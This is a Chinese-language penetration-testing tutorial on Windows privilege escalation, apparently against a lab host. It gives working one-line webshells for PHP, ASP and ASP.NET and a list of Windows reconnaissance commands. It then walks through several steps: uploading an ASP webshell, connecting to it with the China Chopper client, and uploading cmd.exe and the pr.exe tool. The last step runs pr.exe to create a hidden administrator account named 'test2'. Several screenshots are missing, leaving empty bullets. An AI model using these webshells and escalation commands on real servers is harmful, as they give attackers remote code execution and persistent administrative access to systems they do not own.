渗透测试之域内网 Windows提权 小工具pr.exe 提权操作 不同语言类型木马上传方式方法以及连接

windows工具提权 

• 如果我们再获取了一台主机后，无法执行一些指令，那么这个时候我们需要提权，提权后就能执行某些指令，那么这个方式我们就称之为提权【权限提升】操作。 

• 一句话木马

  • ```
    PHP:  <?php @eval($_POST['123']);?>
    
    ASP:  <%eval request("123")%>
    
    ASP.NET:  <%@ Page Language="Jscript"%><%eval(Request.Item["123"],"unsafe");%>
    ```
    
    

 常用windows的系统指令 

• whoami ——查看用户权限
• systeminfo ——查看操作系统，补丁情况
• ipconfig——查看当前服务器
• IP ipconfig /all net user——查看当前用户情况
• netstat ——查看当前网络连接情况
• netstat –ano /netstat –an | find “ESTABLISHED”
• tasklist ——查看当前进程情况
• tasklist /svc taskkill ——结束进程
• taskkill -PID xx net start ——启动服务
• net stop ——停止服务

pr.exe提权操作演示

• 也就是卫星小学的代码目标程序上
• 生成一个asp文档 一句话木马
• 放到目标程序目录下

• 访问webshell 192.168.1.17:81/1.asp 也就是木马程序。
  • 这个涉及到木马程序的使用条件webshell，这个有空写个文章好好给你说说。 

• 访问1.asp程序无报错后，使用菜刀程序进行连接webshell
  • 
  • 这样就进入到程序目录中
  • 
• 在进入这台服务器上的虚拟终端 
  • 
  • 
• 复制win2003 cmd.exe 上传到网站目录文件下
  • 
  • 
  • 执行一些操作 但是不能执行以下系统操作 比如说添加用户
  • 

• 上传提权工具 pr.exe
  •       ​​​​​
• 执行提权操作
• pr.exe "net user test2 123 /add & net localgroup administrators test2 /add"
•